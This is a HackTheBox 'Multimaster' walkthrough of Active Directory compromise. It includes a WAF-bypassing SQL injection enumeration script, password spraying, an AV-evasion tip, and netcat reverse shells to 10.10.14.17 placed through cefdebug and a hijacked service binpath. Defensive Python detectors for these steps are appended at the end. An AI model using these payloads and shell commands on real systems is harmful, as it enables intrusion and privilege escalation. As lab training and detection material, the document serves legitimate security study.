# HackTheBox - Multimaster

## Foothold

Webserver with `/api/getColleagues` SQL injection with a WAF bypass.

## User

### Simple Data Exfil

References:

- http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
- https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/
- https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/

- union injection to exfiltrate data
- escaped unicode characters -> bypass the WAF
- enumerate database -> find table `Logins` with usernames and hashes
- crack hashes and save passwords for later

#### Cracking the hashes

### Enumerate Domain Users via RID

```bash=
#!/bin/bash
# charunicodeescape.py (not shown here) turns the payload into \uXXXX escapes so
# the WAF does not see the SQL keywords, while the JSON parser behind it decodes them.

function get_output {
    out=$(curl -X POST http://10.10.10.179/api/getColleagues -d "{\"name\":\"${1}\"}" -H "Content-Type: application/json" -s)
    resp=$(echo "$out" | cut -d '"' -f18)
    echo "$resp"
}

# TODO more enum scripts
# TODO
function dump_tables {
    :   # not implemented yet
}

# TODO
function dump_hashes {
    :   # not implemented yet
}

function find_domain {
    payload="-1' UNION ALL SELECT 1,2,3,4,DEFAULT_DOMAIN(); --"
    enc_payload=$(python charunicodeescape.py "$payload")
    get_output "$enc_payload"
}

# Enumerates MSSQL users by ID
function find_by_id {
    for id in {1..300}; do
        payload="-1' UNION ALL SELECT 1,2,3,4,SUSER_NAME($id); --"
        enc_payload=$(python charunicodeescape.py "$payload")
        resp=$(get_output "$enc_payload")
        [ ! -z "$resp" ] && echo ID=$id USER=$resp
        sleep 2
    done
}

function get_sid {
    payload="-1' UNION ALL SELECT 1,2,3,4,CONVERT(char(100),SUSER_SID('MEGACORP\Domain Users'),1); --"
    enc_payload=$(python charunicodeescape.py "$payload")
    get_output "$enc_payload"
}

# Enumerates domain users by SID: keep the domain part of the SID (strip the RID of
# "Domain Users" plus the trailing newline) and append candidate RIDs
function find_by_sid {
    sid=$(get_sid | head -c-9)
    for x in {500..1500}; do
        v=$(printf "%08x\n" $x | tr a-z A-Z)    # print as hex and pad with 8 zeros
        hex=${v:6:2}${v:4:2}${v:2:2}${v:0:2}    # convert to little endian
        payload="-1' UNION ALL SELECT 1,2,3,4,SUSER_SNAME($sid$hex); --"
        enc_payload=$(python charunicodeescape.py "$payload")
        user=$(get_output "$enc_payload")
        [ ! -z "$user" ] && echo ID=$hex USER=$user
        sleep 2
    done
}

echo "######## MSSQL Domain Enumeration ########"
echo ""
echo "Domain: "$(find_domain)
#find_by_id
#get_sid
find_by_sid
```

### Password Spraying

- bruteforce login via SMB with the found users and the previously cracked passwords
- login with evil-winrm

## tushikikatomo -> cyork

- `netstat -a` to identify ports listening on 127.0.0.1
- `ps | Select-String "Code"`
- VSCode is being run in intervals; we also notice the listening ports are changing and are only open while VSCode is running
- Electron CEFDebugger listening (NodeJS)
- https://github.com/taviso/cefdebug
- we can abuse it with this tool called cefdebug

```
cefdebug.exe # identify correct url
cefdebug.exe --code "process.mainModule.require('child_process').exec('C:\\windows\\system32\\spool\\drivers\\color\\nc.exe -e cmd.exe 10.10.14.17 1338')" --url ws://127.0.0.1/{<some-uuid>}
```

## cyork -> sbauer

- `net user cyork` -> member of the Developers group
- we can read the `C:\inetpub\wwwroot` directory
- somewhere inside we find `MultimasterAPI.dll` and `MultimasterAPI.pdb`
- easily decompile it with dnSpy or similar tools
- find credentials for the MSSQL user `finder`

### Password Spraying (again)

- another bruteforce attack with this password on all domain users (patator `smb_login`)
- we can login as sbauer, also part of Remote Management -> evil-winrm

## sbauer -> jorden

run SharpHound -> GenericWrite privileges on jorden

use PowerView.ps1 to abuse them in the following way:

```
# Command to get rid of comments and possible AV signatures
# sed '/<#/,/#>/d' powerview.ps1 > new_powerview.ps1
# Credit: https://implicitdeny.org/2016/03/powerview-caught-by-sep/
```

```
*Evil-WinRM* PS C:\Users\sbauer\Documents> Set-DomainObject -Identity jorden -XOR @{useraccountcontrol=4194304} -Verbose
Verbose: [Get-DomainSearcher] search base: LDAP://DC=MEGACORP,DC=LOCAL
Verbose: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=jorden)(name=jorden)(displayname=jorden))))
Verbose: [Set-DomainObject] XORing 'useraccountcontrol' with '4194304' for object 'jorden'
*Evil-WinRM* PS C:\Users\sbauer\Documents> Get-DomainUser jorden | ConvertFrom-UACValue

Name                 Value
----                 -----
NORMAL_ACCOUNT       512
DONT_EXPIRE_PASSWORD 65536
DONT_REQ_PREAUTH     4194304
```

## Privesc to System

- jorden is a member of the Server Operators group
- we have permissions to modify, start & stop some services
- find services that are started in the context of LocalSystem:

```
reg query HKLM\System\CurrentControlSet\Services /f LocalSystem /t REG_SZ /s
```

pick one and hope for the best

```
*Evil-WinRM* PS C:\Users\jorden\Documents> cmd /c sc config wisvc binpath= "%SystemRoot%\system32\spool\drivers\color\nc.exe -e cmd.exe 10.10.14.17 1338"
[SC] ChangeServiceConfig SUCCESS
*Evil-WinRM* PS C:\Users\jorden\Documents> cmd /c sc start wiSvc
PROFIT!!!
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.

*Evil-WinRM* PS C:\Users\jorden\Documents>
```

Shell as NT Authority/System

gg

###### tags: `CTF` `HTB` `Windows`
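The WAF bypass in the User section works because the filter inspects the raw JSON body while the application decodes the `\uXXXX` escapes before the value reaches the query. An added example (not from the original writeup) that runs the same signature over the decoded JSON values instead of the raw bytes; the `make_body` request shape and the `SQLI_RE` signature are assumptions, and the request is constructed.

```python
import json
import re

# Naive keyword signature of the kind a WAF applies to the raw request body (assumed).
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b|'\s*(--|;)", re.IGNORECASE | re.DOTALL)


def unicode_escape(text: str) -> str:
    """Encode every character as a JSON \\uXXXX escape, the transformation the
    writeup's charunicodeescape.py helper applies to the payload."""
    return "".join(f"\\u{ord(c):04x}" for c in text)


def make_body(name: str) -> str:
    """Constructed request body in the shape the /api/getColleagues endpoint expects."""
    return '{"name":"' + unicode_escape(name) + '"}'


def raw_match(body: str) -> bool:
    """Signature check on the raw body only: this is what the escaping defeats."""
    return SQLI_RE.search(body) is not None


def _strings(value):
    """Yield every string nested anywhere inside a parsed JSON document."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for v in value.values():
            yield from _strings(v)
    elif isinstance(value, list):
        for v in value:
            yield from _strings(v)


def decoded_match(body: str) -> bool:
    """Parse the body the way the application will (as JSON) and run the same
    signature over the decoded string values, so \\u escapes no longer hide it."""
    try:
        doc = json.loads(body)
    except ValueError:
        return raw_match(body)  # not JSON: fall back to the raw check
    return any(SQLI_RE.search(s) for s in _strings(doc))


if __name__ == "__main__":
    attack = make_body("-1' UNION ALL SELECT 1,2,3,4,DEFAULT_DOMAIN(); --")
    print("raw check:", raw_match(attack), "decoded check:", decoded_match(attack))
```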
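For the `Set-DomainObject -XOR` step in the sbauer -> jorden section, an added example (not part of the writeup) that decodes userAccountControl values and flags the DONT_REQ_PREAUTH change a defender would want to catch in the old/new UAC values of a 4738 "A user account was changed" event. The flag table is a subset of the documented bits; the jorden before/after values are constructed from the `ConvertFrom-UACValue` output above.

```python
# Subset of userAccountControl bits (values as documented by Microsoft).
UAC_FLAGS = {
    0x00000002: "ACCOUNTDISABLE",
    0x00000200: "NORMAL_ACCOUNT",
    0x00010000: "DONT_EXPIRE_PASSWORD",
    0x00080000: "TRUSTED_FOR_DELEGATION",
    0x00400000: "DONT_REQ_PREAUTH",
}


def decode_uac(value: int) -> list[str]:
    """Name every known flag set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def xor_uac(value: int, mask: int) -> int:
    """Apply the same XOR that Set-DomainObject -XOR performs on the attribute."""
    return value ^ mask


def audit_uac_change(sam: str, old: int, new: int) -> list[str]:
    """Findings for one account change, derived from the old and new UAC values
    (the two fields a 4738 event carries)."""
    before, after = decode_uac(old), decode_uac(new)
    added = [n for n in after if n not in before]
    removed = [n for n in before if n not in after]
    findings = []
    if "DONT_REQ_PREAUTH" in added:
        findings.append(f"{sam}: Kerberos pre-authentication disabled (AS-REP roastable)")
    if "TRUSTED_FOR_DELEGATION" in added:
        findings.append(f"{sam}: unconstrained delegation enabled")
    if "ACCOUNTDISABLE" in removed:
        findings.append(f"{sam}: account re-enabled")
    return findings


if __name__ == "__main__":
    # Constructed: jorden before the change held NORMAL_ACCOUNT + DONT_EXPIRE_PASSWORD.
    old = 512 | 65536
    new = xor_uac(old, 4194304)
    print(decode_uac(new))
    for finding in audit_uac_change("jorden", old, new):
        print(finding)
```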
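For the Server Operators service abuse in the Privesc section, an added example (not the writeup's code) that parses `reg query`-style output of the Services key and flags LocalSystem services whose ImagePath is unknown or differs from a baseline, which is how the `sc config ... binpath=` change above would surface. The sample output and the baseline are constructed.

```python
import re

# Constructed sample in the layout of `reg query HKLM\System\CurrentControlSet\Services /s`,
# trimmed to the two values this audit needs. The wisvc entry mirrors the binpath change above.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Spooler
    ImagePath    REG_EXPAND_SZ    %SystemRoot%\System32\spoolsv.exe
    ObjectName    REG_SZ    LocalSystem

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\wisvc
    ImagePath    REG_EXPAND_SZ    %SystemRoot%\system32\spool\drivers\color\nc.exe -e cmd.exe 10.10.14.17 1338
    ObjectName    REG_SZ    LocalSystem
"""

# Constructed baseline of expected ImagePath values (e.g. exported from a known-good host).
BASELINE = {
    "spooler": r"%SystemRoot%\System32\spoolsv.exe",
    "wisvc": r"%SystemRoot%\system32\svchost.exe -k netsvcs -p",
}

KEY_RE = re.compile(r"^HKEY_LOCAL_MACHINE\\.*\\Services\\([^\\]+)\s*$")
VALUE_RE = re.compile(r"^\s+(\S+)\s{2,}(REG_\w+)\s{2,}(.*?)\s*$")


def parse_services(text: str) -> dict[str, dict[str, str]]:
    """Map service name -> {value name -> data} from reg query output (names lowercased)."""
    services, current = {}, None
    for line in text.splitlines():
        key = KEY_RE.match(line)
        if key:
            current = services.setdefault(key.group(1).lower(), {})
            continue
        val = VALUE_RE.match(line)
        if val and current is not None:
            current[val.group(1).lower()] = val.group(3)
    return services


def audit(services: dict, baseline: dict = BASELINE) -> list[tuple[str, str]]:
    """Flag LocalSystem services whose ImagePath is not in, or differs from, the baseline."""
    findings = []
    for name, values in services.items():
        if values.get("objectname", "").lower() != "localsystem":
            continue
        path, expected = values.get("imagepath", ""), baseline.get(name)
        if expected is None:
            findings.append((name, "LocalSystem service not in baseline"))
        elif path.lower() != expected.lower():
            findings.append((name, f"ImagePath changed: {path}"))
    return findings


if __name__ == "__main__":
    for name, reason in audit(parse_services(SAMPLE)):
        print(name, reason)
```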